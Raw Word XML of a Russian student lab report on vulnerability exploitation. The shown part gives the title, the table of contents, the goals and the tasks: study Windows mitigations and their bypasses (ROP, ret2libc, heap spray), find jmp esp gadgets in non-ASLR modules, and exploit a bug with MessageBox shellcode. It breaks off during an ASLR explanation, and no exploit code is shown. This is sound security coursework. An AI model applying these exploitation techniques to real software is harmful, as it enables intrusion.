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4677ED9A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1401E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2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58563F98" w:rsidR="00830F2D" w:rsidRPr="006A0481" w:rsidRDefault="0091401E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cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Исследование подходов, применяемых при эксплуатации уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAD01E7" w14:textId="7186CE41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57506">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Модели безопасности компьютерных систем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3579CE6C" w:rsidR="00830F2D" w:rsidRDefault="00830F2D" w:rsidP="00CF0BB8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF0E478" w14:textId="77777777" w:rsidR="0091401E" w:rsidRDefault="0091401E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FA387C5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641577">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян Т</w:t>
      </w:r>
      <w:r w:rsidR="00E97AE7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00641577">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Д.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318634A4" w14:textId="3CDA5074" w:rsidR="00D56FB0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2470569" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>1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Цель работы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_Toc222470569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</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="049E3F23" w14:textId="49A83E70" w:rsidR="00D56FB0" w:rsidRDefault="0070285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0" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>2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Задачи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_Toc222470570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</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45E8E719" w14:textId="311EBDA5" w:rsidR="00D56FB0" w:rsidRDefault="0070285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1" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>3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Ход работы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_Toc222470571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</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12F68B91" w14:textId="07479A95" w:rsidR="00D56FB0" w:rsidRDefault="0070285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2" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1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Программа, осуществляющая фаззинг формата файла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_Toc222470572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3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1754F938" w14:textId="62046EC2" w:rsidR="00D56FB0" w:rsidRDefault="0070285D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3" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.1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Анализ конфигурационного файла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_Toc222470573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3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31E98E05" w14:textId="2C56A65D" w:rsidR="00D56FB0" w:rsidRDefault="0070285D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4" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.2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Программа-фаззер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_Toc222470574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6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67FA23E4" w14:textId="4E866901" w:rsidR="00D56FB0" w:rsidRDefault="0070285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5" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IDAPython</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-скрипт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_Toc222470575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11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023FC603" w14:textId="1A7E38B0" w:rsidR="00D56FB0" w:rsidRDefault="0070285D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6" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3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Участок кода с уязвимостью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_Toc222470576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12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639C0EF2" w14:textId="157F5A33" w:rsidR="00D56FB0" w:rsidRDefault="0070285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7" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>4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Вывод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_Toc222470577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14</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74F63A0C" w14:textId="4D90BD1B" w:rsidR="00D56FB0" w:rsidRDefault="0070285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8" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>Приложение 1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_Toc222470578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15</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="251DD0ED" w14:textId="3AC3085D" w:rsidR="00D56FB0" w:rsidRDefault="0070285D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9" w:history="1">
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
              </w:rPr>
              <w:t>Приложение</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0" w:rsidRPr="00597A16">
              <w:rPr>
                <w:rStyle w:val="aff3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2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_Toc222470579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30</w:t>
            </w:r>
            <w:r w:rsidR="00D56FB0">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6D1EC16B" w14:textId="7F95D12A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6FDB31C9" w:rsidR="00812A5B" w:rsidRDefault="00812A5B" w:rsidP="00616951">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc222470569"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="4711D7FE" w14:textId="4A50758B" w:rsidR="0091401E" w:rsidRPr="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Изучить способы</w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплуатации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимостей и механизмов противодействия</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88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2846EE86" w14:textId="17AB1FFB" w:rsidR="006A179F" w:rsidRDefault="006A179F" w:rsidP="006E598D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc222470570"/>
      <w:r>
        <w:t>Задачи</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="6EFEB139" w14:textId="77777777" w:rsidR="0091401E" w:rsidRPr="0073513D" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Изучить защитные механизмы, затрудняющие эксплуатацию уязвимостей (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="0073513D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="0073513D">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GS</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00D37478">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, SAFESEH, SEHOP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1B944" w14:textId="77777777" w:rsidR="0091401E" w:rsidRPr="0073513D" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Изучить техники эксплуатации уязвимостей и способы обхода защитных механизмов (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>libc</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pivoting</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Heap</w:t>
      </w:r>
      <w:r w:rsidRPr="009D347A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Spray</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE284B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и другие).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D2C5C" w14:textId="77777777" w:rsidR="0091401E" w:rsidRPr="009D3964" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Используя скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00B80F59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> для отладчиков </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00644E56">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B80F59">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>или другой с аналогичной функциональностью осуществить получение списка загруженных в процесс модулей, не использующих технологию рандомизации адресов. Реализовать скрипт для отладчика</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEBAA47" w14:textId="77777777" w:rsidR="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Найти в динамических библиотеках без рандомизации адресов опкоды инструкций, необходимых для передачи управления (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, …)</w:t>
      </w:r>
      <w:r w:rsidRPr="005F1F22">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>на полезную нагрузку. Реализовать для этих целей скрипт для отладчика (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="0048093C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00644E56">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDBG</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6644">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDA</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6644">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030033A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF02C00" w14:textId="3D64E940" w:rsidR="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Провести эксплуатацию найденной уязвимости, с использованием полезной нагрузки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) в соответствии с выданным вариантом (11 - </w:t>
      </w:r>
      <w:r w:rsidRPr="004129B2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Вывод MessageBox'ом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>произвольной строки).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF69310" w14:textId="44A9C02B" w:rsidR="0091401E" w:rsidRPr="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Эксплуатацию уязвимости осуществлять под ОС семейства </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> версии не ниже </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1582">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>При эксплуатации запрещ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ено изменение исполняемого файла, запуск сторонних исполняемых файлов, либо выполнение консольных команд</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Полезная нагрузка должна быть написана на языке ассемблера, либо на языке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00342F84">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>с использованием приемом разработки базонезависимого кода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A81688" w14:textId="25BBD6C9" w:rsidR="006A179F" w:rsidRDefault="006A179F" w:rsidP="006E598D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc222470571"/>
      <w:r>
        <w:t>Ход работы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="443FE01A" w14:textId="17A45AA5" w:rsidR="00F471B5" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Список модулей, не использующих технологию рандомизации адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17362D0F" w14:textId="5D3CC525" w:rsidR="0091401E" w:rsidRDefault="0091401E" w:rsidP="0091401E">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Space</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Layout</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Randomization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">- это механизм, при котором ОС старается загружать исполняемые образы и другие области памяти по разным адресам при разных запусках процесса. Идея в том, чтобы атакующий не мог заранее знать точный адрес кода, стека, кучи или </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:t xml:space="preserve">. В </w:t>
      </w:r>
      <w:r w:rsidRPr="0091401E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
